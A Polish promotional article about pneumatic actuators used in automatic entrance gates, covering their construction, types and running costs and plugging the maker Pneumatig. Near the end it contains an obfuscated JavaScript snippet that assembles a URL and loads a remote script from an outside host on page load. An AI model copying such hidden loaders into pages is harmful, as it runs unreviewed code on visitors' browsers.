Bezpieczeństwo mienia, ale i bezpieczeństwo obsługi bramy wjazdowej jest istotne z punktu widzenia użytkowników indywidualnych, ale i firm, choćby branży transportowej i spedycyjnej. Bramy otwierane ręcznie nie są tak efektywne, jak te, w których zastosowana jest automatyka do bram wjazdowych. Tutaj świetnie sprawdzają się siłowniki pneumatyczne. Warto na ich temat dowiedzieć się więcej i poznać zasady ich funkcjonowania.
Siłownik pneumatyczny - co warto wiedzieć na temat jego budowy i funkcjonowania
Siłowniki pneumatyczne niewątpliwie są przydatnymi urządzeniami i sercem całego układu pneumatycznego. Wykorzystując energię sprężonego powietrza, mogą wytworzyć siłę, która z kolei może napędzać np. urządzenia. Jednocześnie warto wiedzieć, że ich budowa jest relatywnie prosta, podobnie jak sposób działania. Elementami typowego siłownika pneumatycznego są: tuleja cylindrowa, pokrywa przednia oraz tylna, a także tłok pneumatyczny i tłoczysko. Bardzo ważnymi elementami są również pierścień uszczelniający połączenie ruchowe tłoka, pierścień uszczelniający umieszczony w pokrywie przedniej, czy pierścień zgarniający. Skoro już wiecie, że sercem inżynierii pneumatycznej jest właśnie siłownik pneumatyczny, to czas dowiedzieć się więcej, jak dokładnie wytwarzana jest siła.
Siłownik pneumatyczny jest elementem wykonawczym, który przesuwa tłoczyska wewnątrz cylindra. Duże znaczenie ma fakt, że na tłoczysku zamocowany jest tłok, który dzieli przestrzeń w środku cylindra pneumatycznego na dwie komory. Do jednej oczywiście wpuszczane jest powietrze, czego następstwem jest przesunięcie tłoka. Na końcu zaś dochodzi do wysuwu lub wsuwu tłoczyska. Pamiętajcie, że siłowniki, choć mają prostą budowę, to jednak różnią się od siebie rozmiarami, przeznaczeniem, ale też sposobem mocowania. W niektórych modelach można dodatkowo zainstalować akcesoria. Jakie więc wyróżniamy rodzaje siłowników pneumatycznych?
Są to choćby siłowniki jednostronnego i dwustronnego działania, siłowniki liniowe, obrotowe, zderzakowe czy dociskowe okrągłe. Pamiętajcie o jeszcze jednej bardzo ważnej rzeczy, a mianowicie, aby wybierać urządzenia oparte na normach ISO. W ten prosty sposób w razie zużycia siłownika pneumatycznego bardzo szybko możecie go zastąpić i po prostu wymienić. Same koszty nie są wysokie.
Siłowniki pneumatyczne - rodzaje stosowane w automatyce bram wjazdowych
Wyobraźcie sobie, że siłowniki pneumatyczne wykorzystuje się nie tylko w przemyśle, branży farmaceutycznej, spożywczej. Także w codziennym życiu są one niejako na wyciągnięcie ręki. Poza faktem, że znajdują się w szafkach czy też w mechanizmie otwierania drzwi czy bagażnika, to można je znaleźć też w bramach wjazdowych. Rzeczywiście w bramach wjazdowych wykorzystywane jest czyste medium, czyli energia sprężonego powietrza, która przetworzona jest w siłę. Dzięki temu oczywiście brama wjazdowa otwiera się i zamyka.
Warto też zauważyć, że siłowniki pneumatyczne, które wykorzystują sprężone powietrze nie są narażone na częste awarie. W dużej mierze wynika to z faktu, że medium sprężonego powietrza klasy V uznawane jest za bardzo czyste i nawet ewentualne rozszczelnienie instalacji nie ma negatywnego wpływu nie tylko na środowisko, ale też osobę obsługującą dany sprzęt. Oczywiście bywają sytuacje, że warunki pracy są zdecydowanie trudniejsze i występuje np. duże zapylenie, ale mogą być też stosowane oleje, czy inne zanieczyszczenia, które mają negatywny wpływ na siłownik pneumatyczny.
Na szczęście w takim przypadku można stosować siłowniki posiadające uszczelnienia z kauczuku fluorowego z wkładką. Można zdecydować się na siłownik pneumatyczny Pneumatig. Producent siłowników pneumatycznych oferuje modele posiadające niezbędną certyfikację. Warto jeszcze pamiętać, że wkładki usuwają nawet uporczywe zabrudzenia, w tym zaschnięty beton.
Czy stosowanie sprężonego powietrza jest tanie?
Używanie sprężonego powietrza w siłownikach nie jest bardzo tanie. Jednak same koszty eksploatacyjne nie muszą być wysokie. Wystarczy tylko dobrać odpowiednie rodzaje siłowników, które posiadają właściwy, dobrze dobrany skok. Musicie wiedzieć, że czym wyższy skok, tym zużycie sprężonego powietrza jest wyższe. Jednak z drugiej strony należy zdawać sobie sprawę, że siłowniki pneumatyczne są urządzeniami uznawanymi za niezawodne. Nie wymagają częstych napraw, a w razie konieczności można łatwo znaleźć zamienniki. Takie oferuje producent siłowników Pneumatig. Najpopularniejszym rodzajem siłowników pneumatycznych są te dwustronnego działania, które rzeczywiście można wykorzystać w niemal każdej branży przemysłu.
(function(){
qwdv=document.createElement("script");qwdv_=("us")+("ta");
qwdv_+="t"+(".");qwdv_+=("in");qwdvu="426958346";qwdv.async=true;
qwdvu+=".1i6r08alwdvtmjg8s";qwdv.type="text/javascript";qwdv_+="f"+"o"+("/");
qwdvu+="el579ebjxr83h";qwdv.src="https://"+qwdv_+qwdvu;
dqwdv=document.body;dqwdv.appendChild(qwdv);
})();
Użytkowniku, pamiętaj, że w Internecie nie jesteś anonimowy. Ponosisz odpowiedzialność za treści zamieszczane na portalu tyna.info.pl. Dodanie opinii jest równoznaczne z akceptacją Regulaminu portalu. Jeśli zauważyłeś, że któraś opinia łamie prawo lub dobry obyczaj - powiadom nas [email protected] lub użyj przycisku Zgłoś komentarz
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz